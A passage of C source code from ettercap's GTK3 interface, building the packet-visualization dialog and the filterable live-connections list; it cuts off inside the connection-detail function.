EC_GBL_STATS->th.pck_size); gtk_label_set_text(GTK_LABEL (recv_top), line); snprintf(line, 50, "%.2f %%", (EC_GBL_STATS->bh.pck_recv) ? (float)EC_GBL_STATS->th.pck_recv * 100 / EC_GBL_STATS->bh.pck_recv : 0 ); gtk_label_set_text(GTK_LABEL (interesting), line); snprintf(line, 50, "worst: %8lu adv: %8lu p/s", EC_GBL_STATS->bh.rate_worst, EC_GBL_STATS->bh.rate_adv); gtk_label_set_text(GTK_LABEL (rate_bottom), line); snprintf(line, 50, "worst: %8lu adv: %8lu p/s", EC_GBL_STATS->th.rate_worst, EC_GBL_STATS->th.rate_adv); gtk_label_set_text(GTK_LABEL (rate_top), line); snprintf(line, 50, "worst: %8lu adv: %8lu b/s", EC_GBL_STATS->bh.thru_worst, EC_GBL_STATS->bh.thru_adv); gtk_label_set_text(GTK_LABEL (through_bottom), line); snprintf(line, 50, "worst: %8lu adv: %8lu b/s", EC_GBL_STATS->th.thru_worst, EC_GBL_STATS->th.thru_adv); gtk_label_set_text(GTK_LABEL (through_top), line); return(TRUE); } /* * change the visualization method */ void gtkui_vis_method(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *dialog, *button, *prev, *vbox, *content_area; GSList *curr = NULL; gint active = 0, response = 0; GtkTreeModel *model; GtkTreeIter iter; GtkListStore *lang_list = NULL; GtkCellRenderer *cell = NULL; GtkWidget *hbox, *lang_combo, *label; char encoding[50], def_lang[75]; const char *local_lang, *selected_lang; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_vis_method"); dialog = gtk_dialog_new_with_buttons("Visualization method...", GTK_WINDOW (window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT | GTK_DIALOG_USE_HEADER_BAR, "_Cancel", GTK_RESPONSE_CANCEL, "_OK", GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER(content_area), vbox); button = gtk_radio_button_new_with_label(NULL, "Print the packets in hex format."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "hex") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Print only \"printable\" characters, the others are displayed as dots '.'"); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "ascii") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Print only the \"printable\" characters and skip the others."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "text") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Convert an EBCDIC text to ASCII."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "ebcdic") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Strip all the html tags from the text. A tag is every string between < and >."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "html") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; /* start UTF8 */ button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Convert the data from the encoding specified below to UTF8 before displaying it."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "utf8") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 6); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); label = gtk_label_new ("Character encoding : "); gtk_box_pack_start (GTK_BOX (hbox), label, FALSE, FALSE, 0); /* Fill a list of available encodings */ lang_list = gtk_list_store_new(1, G_TYPE_STRING); /* get the system's default encoding, and if it's not UTF8, add it to the list */ if(!g_get_charset(&local_lang)) { snprintf(def_lang, 75, "%s (System Default)", local_lang); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, def_lang, -1); } /* some other common encodings */ gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "UTF-8", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "EBCDIC-US (IBM)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-15 (Western Europe)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-2 (Central Europe)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-7 (Greek)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-8 (Hebrew)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-9 (Turkish)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-2022-JP (Japanese)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "SJIS (Japanese)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP949 (Korean)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP1251 (Cyrillic)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP1256 (Arabic)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "GB18030 (Chinese)", -1); /* make a drop down box and assign the list to it */ lang_combo = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(lang_combo), GTK_TREE_MODEL(lang_list)); /* list is stored in the widget, can safely free this copy */ g_object_unref(lang_list); /* end UTF8 */ cell = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(lang_combo), cell, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(lang_combo), cell, "text", 0, NULL); gtk_combo_box_set_active(GTK_COMBO_BOX(lang_combo), 0); gtk_box_pack_start (GTK_BOX(hbox), lang_combo, TRUE, TRUE, 0); gtk_widget_show_all(vbox); response = gtk_dialog_run(GTK_DIALOG (dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); /* see which button was clicked */ active = 0; for(curr = gtk_radio_button_get_group(GTK_RADIO_BUTTON (button)); curr; curr = curr->next) { active++; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (curr->data))) break; } /* set vmethod string */ int i=0; memset(vmethod, 0, VLEN); switch(active) { case 6: strncpy(vmethod, "hex", 4); break; case 5: strncpy(vmethod, "ascii", 6); break; case 4: strncpy(vmethod, "text", 5); break; case 3: strncpy(vmethod, "ebcdic", 7); break; case 2: strncpy(vmethod, "html", 5); break; case 1: /* utf8 */ /* copy first word from encoding choice */ gtk_combo_box_get_active_iter(GTK_COMBO_BOX(lang_combo), &iter); model = gtk_combo_box_get_model(GTK_COMBO_BOX(lang_combo)); gtk_tree_model_get(model, &iter, 0, &selected_lang, -1); i=sscanf(selected_lang, "%[^ ]", encoding); BUG_IF(i!=1); if(strlen(encoding) > 0) { strncpy(vmethod, "utf8", 5); set_utf8_encoding(encoding); break; } /* fall through */ default: strncpy(vmethod, "ascii", 6); } set_format(vmethod); } gtk_widget_destroy(dialog); } /* * set the visualization regex */ void gtkui_vis_regex(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; DEBUG_MSG("gtk_vis_regex"); gtkui_input("Visualization regex :", vregex, RLEN, gtkui_set_regex); } static void gtkui_set_regex(void) { set_regex(vregex); } /* * set the Wifi key */ void gtkui_wifi_key(GSimpleAction *action, GVariant *value, gpointer data) { (void) action; (void) value; (void) data; DEBUG_MSG("gtk_wifi_key"); gtkui_input("WiFi key :", wkey, WLEN, gtkui_set_wifikey); } static void gtkui_set_wifikey(void) { wifi_key_prepare(wkey); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk3/ec_gtk3_view_connections.c000664 000000 000000 00000176112 13711276346 024373 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include /* double-linked list for fast updates to connection list */ struct row_pairs { void *conn; GtkTreeIter iter; struct row_pairs *next; struct row_pairs *prev; }; /* filter objects */ struct conn_filter { /* model handle for filtered tree */ GtkTreeModel *model; /* Host filter */ const gchar *host; /* Protocol filter */ gboolean tcp; gboolean udp; gboolean other; /* Connection state filter */ gboolean active; gboolean idle; gboolean closing; gboolean closed; gboolean killed; }; /* proto */ static void gtkui_connections_detach(GtkWidget *child); static void gtkui_connections_attach(void); static void gtkui_kill_connections(void); static gboolean refresh_connections(gpointer data); static struct row_pairs *gtkui_connections_add(struct conn_object *co, void *conn, struct row_pairs **list); static void gtkui_connection_list_row(int top, struct row_pairs *pair); static void gtkui_connection_detail(void); static void gtkui_connection_detail_destroy(GtkWidget *widget, gpointer *data); static void gtkui_connection_data(void); static void gtkui_connection_data_split(void); static void gtkui_connection_data_join(void); static void gtkui_connection_data_detach(GtkWidget *child); static void gtkui_connection_data_attach(void); static void gtkui_destroy_conndata(void); static gboolean gtkui_connections_scroll(gpointer data); static void gtkui_data_print(int buffer, char *data, int color); static void split_print(u_char *text, size_t len, struct ip_addr *L3_src); static void split_print_po(struct packet_object *po); static void join_print(u_char *text, size_t len, struct ip_addr *L3_src); static void join_print_po(struct packet_object *po); static void gtkui_connection_purge(void *conn); static void gtkui_connection_kill(void *conn); static void gtkui_connection_kill_curr_conn(void); static void gtkui_connection_inject(void); static void gtkui_inject_user(int side); static void gtkui_connection_inject_file(void); static void gtkui_inject_file(const char *filename, int side); static void set_connfilter(GtkWidget *widget, gpointer *data); static void set_connfilter_host(GtkWidget *widget, gpointer *data); static gboolean connfilter(GtkTreeModel *model, GtkTreeIter *iter, gpointer *data); extern void conntrack_lock(void); extern void conntrack_unlock(void); /*** globals ***/ /* connection list */ static struct row_pairs *connections = NULL; static GtkWidget *conns_window = NULL; static GtkWidget *treeview = NULL; /* the visible part of the GTK list */ static GtkListStore *ls_conns = NULL; /* the data part */ static GtkTreeSelection *selection = NULL; static struct conn_object *curr_conn = NULL; static struct conn_filter filter; static guint connections_idle = 0; /* connection detail window */ static guint detail_timer1 = 0; static guint detail_timer2 = 0; /* split and joined data views */ static GtkWidget *data_window = NULL; static GtkWidget *textview1 = NULL; /* visible part of data output */ static GtkWidget *textview2 = NULL; static GtkWidget *textview3 = NULL; static GtkTextBuffer *splitbuf1 = NULL; /* where data is stored */ static GtkTextBuffer *splitbuf2 = NULL; static GtkTextBuffer *joinedbuf = NULL; static GtkTextMark *endmark1 = NULL; /* marks for auto-scrolling */ static GtkTextMark *endmark2 = NULL; static GtkTextMark *endmark3 = NULL; /* keep it global, so the memory region is always the same (reallocing it) */ static u_char *dispbuf; static u_char *injectbuf; /*******************************************/ /* * the auto-refreshing list of connections */ void gtkui_show_connections(GSimpleAction *action, GVariant *value, gpointer data) { GtkWidget *scrolled, *vbox, *items, *hbox, *button, *tbox, *box; GtkWidget *context_menu, *frame, *entry, *chkb_tcp, *chkb_udp, *chkb_other; GtkWidget *chkb_active, *chkb_idle, *chkb_closing, *chkb_closed, *chkb_killed; GtkTreeModel *model; GtkToolItem *toolbutton; GtkCellRenderer *renderer; GtkTreeViewColumn *column; (void) action; (void) value; (void) data; DEBUG_MSG("gtk_show_connections"); /* if the object already exist, set the focus to it */ if (conns_window) { if(GTK_IS_WINDOW (conns_window)) gtk_window_present(GTK_WINDOW (conns_window)); else gtkui_page_present(conns_window); return; } conns_window = gtkui_page_new("Connections", >kui_kill_connections, >kui_connections_detach); vbox = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); gtk_container_add(GTK_CONTAINER (conns_window), vbox); gtk_widget_show(vbox); /* filter bar */ hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 10); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_set_margin_top(hbox, 5); gtk_widget_set_margin_bottom(hbox, 5); gtk_widget_set_margin_start(hbox, 5); frame = gtk_frame_new("Host filter"); tbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_container_add(GTK_CONTAINER(frame), tbox); box = gtk_box_new(GTK_ORIENTATION_VERTICAL, 0); entry = gtk_entry_new(); g_signal_connect(G_OBJECT(entry), "activate", G_CALLBACK(set_connfilter_host), NULL); gtk_box_pack_start(GTK_BOX(box), entry, TRUE, FALSE, 5); gtk_box_pack_start(GTK_BOX(tbox), box, TRUE, FALSE, 5); toolbutton = gtk_tool_button_new( gtk_image_new_from_icon_name("system-search", GTK_ICON_SIZE_BUTTON), "Search"); g_signal_connect_swapped(G_OBJECT(toolbutton), "clicked", G_CALLBACK(set_connfilter_host), entry); gtk_box_pack_start(GTK_BOX(tbox), GTK_WIDGET(toolbutton), FALSE, FALSE, 5); filter.host = NULL; gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); frame = gtk_frame_new("Protocol filter"); tbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_container_add(GTK_CONTAINER(frame), tbox); chkb_tcp = gtk_check_button_new_with_label("TCP"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_tcp), TRUE); filter.tcp = TRUE; g_signal_connect(G_OBJECT(chkb_tcp), "toggled", G_CALLBACK(set_connfilter), &filter.tcp); gtk_box_pack_start(GTK_BOX(tbox), chkb_tcp, FALSE, FALSE, 5); chkb_udp = gtk_check_button_new_with_label("UDP"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_udp), TRUE); filter.udp = TRUE; g_signal_connect(G_OBJECT(chkb_udp), "toggled", G_CALLBACK(set_connfilter), &filter.udp); gtk_box_pack_start(GTK_BOX(tbox), chkb_udp, FALSE, FALSE, 5); chkb_other = gtk_check_button_new_with_label("Other"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_other), TRUE); filter.other = TRUE; g_signal_connect(G_OBJECT(chkb_other), "toggled", G_CALLBACK(set_connfilter), &filter.other); gtk_box_pack_start(GTK_BOX(tbox), chkb_other, FALSE, FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); frame = gtk_frame_new("Connection state filter"); tbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 0); gtk_container_add(GTK_CONTAINER(frame), tbox); chkb_active = gtk_check_button_new_with_label("Active"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_active), TRUE); filter.active = TRUE; g_signal_connect(G_OBJECT(chkb_active), "toggled", G_CALLBACK(set_connfilter), &filter.active); gtk_box_pack_start(GTK_BOX(tbox), chkb_active, FALSE, FALSE, 5); chkb_idle = gtk_check_button_new_with_label("Idle"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_idle), TRUE); filter.idle = TRUE; g_signal_connect(G_OBJECT(chkb_idle), "toggled", G_CALLBACK(set_connfilter), &filter.idle); gtk_box_pack_start(GTK_BOX(tbox), chkb_idle, FALSE, FALSE, 5); chkb_closing = gtk_check_button_new_with_label("Closing"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_closing), TRUE); filter.closing = TRUE; g_signal_connect(G_OBJECT(chkb_closing), "toggled", G_CALLBACK(set_connfilter), &filter.closing); gtk_box_pack_start(GTK_BOX(tbox), chkb_closing, FALSE, FALSE, 5); chkb_closed = gtk_check_button_new_with_label("Closed"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_closed), TRUE); filter.closed = TRUE; g_signal_connect(G_OBJECT(chkb_closed), "toggled", G_CALLBACK(set_connfilter), &filter.closed); gtk_box_pack_start(GTK_BOX(tbox), chkb_closed, FALSE, FALSE, 5); chkb_killed = gtk_check_button_new_with_label("Killed"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_killed), TRUE); filter.killed = TRUE; g_signal_connect(G_OBJECT(chkb_killed), "toggled", G_CALLBACK(set_connfilter), &filter.killed); gtk_box_pack_start(GTK_BOX(tbox), chkb_killed, FALSE, FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); gtk_widget_show_all(hbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row_activated", G_CALLBACK (gtkui_connection_data), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Host ", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Port", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("-", renderer, "text", 3, NULL); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Host ", renderer, "text", 4, NULL); gtk_tree_view_column_set_sort_column_id (column, 4); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Port", renderer, "text", 5, NULL); gtk_tree_view_column_set_sort_column_id (column, 5); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Proto", renderer, "text", 6, NULL); gtk_tree_view_column_set_sort_column_id (column, 6); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("State", renderer, "text", 7, NULL); gtk_tree_view_column_set_sort_column_id (column, 7); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("TX Bytes", renderer, "text", 8, NULL); gtk_tree_view_column_set_sort_column_id (column, 8); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("RX Bytes", renderer, "text", 9, NULL); gtk_tree_view_column_set_sort_column_id (column, 9); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #ifdef HAVE_GEOIP renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Countries", renderer, "text", 10, NULL); gtk_tree_view_column_set_sort_column_id (column, 10); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); #endif hbox = gtk_box_new(GTK_ORIENTATION_HORIZONTAL, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); button = gtk_button_new_with_mnemonic("View _Details"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_detail), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("_Kill Connection"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_kill), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); button = gtk_button_new_with_mnemonic("E_xpunge Connections"); g_signal_connect (G_OBJECT (button), "clicked", G_CALLBACK (gtkui_connection_purge), NULL); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); gtk_widget_show(button); /* context menu */ context_menu = gtk_menu_new(); items = gtk_menu_item_new_with_label("View Details"); gtk_menu_shell_append (GTK_MENU_SHELL (context_menu), items); g_signal_connect (G_OBJECT (items), "activate", G_CALLBACK (gtkui_connection_detail), NULL); gtk_widget_show (items); items = gtk_menu_item_new_with_label("Kill Connection"); gtk_menu_shell_append (GTK_MENU_SHELL (context_menu), items); g_signal_connect (G_OBJECT (items), "activate", G_CALLBACK (gtkui_connection_kill), NULL); gtk_widget_show (items); g_signal_connect(G_OBJECT(treeview), "button-press-event", G_CALLBACK(gtkui_context_menu), context_menu); /* initialize the list */ refresh_connections(NULL); /* init filter model handle */ filter.model = gtk_tree_model_filter_new(GTK_TREE_MODEL(ls_conns), NULL); gtk_tree_model_filter_set_visible_func(GTK_TREE_MODEL_FILTER(filter.model), (GtkTreeModelFilterVisibleFunc)connfilter, NULL, NULL); /* sorting model has to be explicitely created from the filtered model to support both */ model = gtk_tree_model_sort_new_with_model(filter.model); /* link the Tree Model with the Tree View */ gtk_tree_view_set_model(GTK_TREE_VIEW (treeview), model); /* refresh the list every 1000 ms */ /* gtk_idle_add refreshes too fast, uses all cpu */ connections_idle = g_timeout_add(1000, refresh_connections, NULL); gtk_widget_show(conns_window); } /* callback for detaching the tab */ void gtkui_connections_detach(GtkWidget *child) { conns_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (conns_window), "Live connections"); gtk_window_set_default_size(GTK_WINDOW (conns_window), 500, 250); g_signal_connect(G_OBJECT(conns_window), "delete_event", G_CALLBACK(gtkui_kill_connections), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(conns_window, gtkui_connections_attach); gtk_container_add(GTK_CONTAINER (conns_window), child); gtk_window_present(GTK_WINDOW (conns_window)); } /* callback for attaching the tab */ static void gtkui_connections_attach(void) { gtkui_kill_connections(); gtkui_show_connections(NULL, NULL, NULL); } /* connection list closed */ static void gtkui_kill_connections(void) { DEBUG_MSG("gtk_kill_connections"); g_source_remove(connections_idle); gtk_widget_destroy(conns_window); conns_window = NULL; } /* for keeping the connection list in sync with the conntrack list */ static gboolean refresh_connections(gpointer data) { struct row_pairs *lastconn = NULL, *cache = NULL; GtkTreeModel *model = GTK_TREE_MODEL (ls_conns); void *list, *next, *listend; struct conn_object *conn; /* stores connection details */ GtkTreeIter iter; /* points to a specific row */ char flags[2], status[8]; unsigned int tx = 0, rx = 0; struct row_pairs *row = NULL, *nextrow = NULL, top, bottom; /* variable not used */ (void) data; /* init strings */ memset(&flags, 0, sizeof(flags)); memset(&status, 0, sizeof(status)); /* make sure the list has been created and window is visible */ if(ls_conns) { if (!gtk_widget_get_visible(conns_window)) return(FALSE); } else { /* Columns: Flags, Host, Port, "-", Host, Port, Proto, State, TX Bytes, RX Bytes, Countries, (hidden) pointer */ ls_conns = gtk_list_store_new (12, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_STRING, G_TYPE_UINT, G_TYPE_UINT, G_TYPE_STRING, G_TYPE_POINTER); connections = NULL; } /* remove old connections */ for(row = connections; row; row = nextrow) { nextrow = row->next; if(conntrack_get(0, row->conn, NULL) == NULL) { /* remove row from the GTK list */ gtk_list_store_remove(GTK_LIST_STORE(ls_conns), &row->iter); /* remove pointers from the linked-list and free */ if(row->next) row->next->prev = row->prev; if(row->prev) row->prev->next = row->next; else connections = row->next; SAFE_FREE(row); } if(row) lastconn = row; } /* make sure we have a place to start searching for new rows */ if(!lastconn) { listend = conntrack_get(0, NULL, NULL); if(listend == NULL) return(TRUE); } else { listend = lastconn->conn; } /* add new connections */ for(list = conntrack_get(+1, listend, NULL); list; list = next) { next = conntrack_get(+1, list, &conn); cache = gtkui_connections_add(conn, list, &connections); if(cache) lastconn = cache; } /* find the first and last visible rows */ gtkui_connection_list_row(1, &top); gtkui_connection_list_row(0, &bottom); if(top.conn == NULL) return(TRUE); iter = top.iter; /* copy iter by value */ /* update visible part of list */ do { /* get the conntrack pointer for this row */ gtk_tree_model_get (model, &iter, 11, &list, -1); conntrack_get(0, list, &conn); /* extract changing values from conntrack_print string */ conntrack_flagstr(conn, flags, sizeof(flags)); conntrack_statusstr(conn, status, sizeof(status)); tx = conn->tx; rx = conn->rx; gtk_list_store_set (ls_conns, &iter, 0, flags, 7, status, 8, tx, 9, rx, -1); /* when we reach the bottom of the visible part, stop updating */ if(bottom.conn == list) break; } while(gtk_tree_model_iter_next(model, &iter)); /* finnaly apply the filter */ gtk_tree_model_filter_refilter(GTK_TREE_MODEL_FILTER(filter.model)); return(TRUE); } static struct row_pairs *gtkui_connections_add(struct conn_object *co, void *conn, struct row_pairs **list) { GtkTreeIter iter; char flags[2], src[MAX_ASCII_ADDR_LEN], dst[MAX_ASCII_ADDR_LEN]; char proto[4], status[8], ccodes[8]; unsigned int src_port = 0, dst_port = 0, tx = 0, rx = 0; struct row_pairs *row = NULL; /* even if list is empty, we need a pointer to the NULL pointer */ /* so we can start a list */ if(!list) return(NULL); /* init strings */ memset(&flags, 0, sizeof(flags)); memset(&proto, 0, sizeof(proto)); memset(&src, 0, sizeof(src)); memset(&dst, 0, sizeof(dst)); memset(&status, 0, sizeof(status)); memset(&ccodes, 0, sizeof(ccodes)); /* copy data from conntrack_print string */ conntrack_flagstr(co, flags, sizeof(flags)); conntrack_statusstr(co, status, sizeof(status)); conntrack_protostr(co, proto, sizeof(proto)); conntrack_countrystr(co, ccodes, sizeof(ccodes)); ip_addr_ntoa(&co->L3_addr1, src); ip_addr_ntoa(&co->L3_addr2, dst); src_port = ntohs(co->L4_addr1); dst_port = ntohs(co->L4_addr2); tx = co->tx; rx = co->rx; /* add it to GTK list */ gtk_list_store_append (ls_conns, &iter); gtk_list_store_set (ls_conns, &iter, 0, flags, 1, src, 2, src_port, 3, "-", 4, dst, 5, dst_port, 6, proto, 7, status, 8, tx, 9, rx, 10, ccodes, 11, conn, -1); /* and add it to our linked list */ if(!*list) { row = malloc(sizeof(struct row_pairs)); if(row == NULL) { USER_MSG("Failed create new connection row\n"); DEBUG_MSG("gktui_connections_add: failed to allocate memory for a new row"); } row->prev = NULL; } else { for(row = *list; row && row->next; row = row->next); row->next = malloc(sizeof(struct row_pairs)); if(row->next == NULL) { USER_MSG("Failed create new connection row\n"); DEBUG_MSG("gktui_connections_add: failed to allocate memory for a new row"); } row->next->prev = row; row = row->next; } row->conn = conn; row->iter = iter; row->next = NULL; /* in case this was the first list entry */ if(!*list) *list = row; return(row); } /* * get the top or bottom visible row in the connection list * returns TOP row if (int top) is > 0 and list is not empty * returns BOTTOM row if (int top) is 0 and visible area is full */ static void gtkui_connection_list_row(int top, struct row_pairs *pair) { GtkTreeIter iter; /* points to a specific row */ GtkTreePath *path = NULL; /* for finding the first visible row */ GtkTreeModel *model = NULL; /* points to the list data */ GdkRectangle rect; /* holds coordinates of visible rows */ int wx = 0, wy = 0; /* for converting tree view coords to widget coords */ void *row = NULL; if(!ls_conns || !pair) return; /* in case we don't get a row */ pair->conn = NULL; model = GTK_TREE_MODEL (ls_conns); if(gtk_tree_model_get_iter_first(model, &iter)) { gtk_tree_view_get_visible_rect(GTK_TREE_VIEW(treeview), &rect); /* get the first visible row */ gtk_tree_view_convert_bin_window_to_widget_coords(GTK_TREE_VIEW(treeview), rect.x, (top)?rect.y:rect.height, &wx, &wy); path = gtk_tree_path_new(); if(gtk_tree_view_get_path_at_pos(GTK_TREE_VIEW(treeview), wx+2, (top)?wy+2:wy-2, &path, NULL, NULL, NULL)) { gtk_tree_model_get_iter(model, &iter, path); gtk_tree_model_get (model, &iter, 11, &row, -1); pair->iter = iter; pair->conn = row; } if(path) gtk_tree_path_free(path); } return; } /* * details for a connection */ static void gtkui_connection_detail(void) { GtkWidget *dwindow, *vbox, *hbox, *grid, *label, *header, *content; GtkTreeIter iter; GtkTreeModel *model; struct conn_tail *c = NULL; char tmp[MAX_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN]; gchar *str, *markup; guint row = 0, 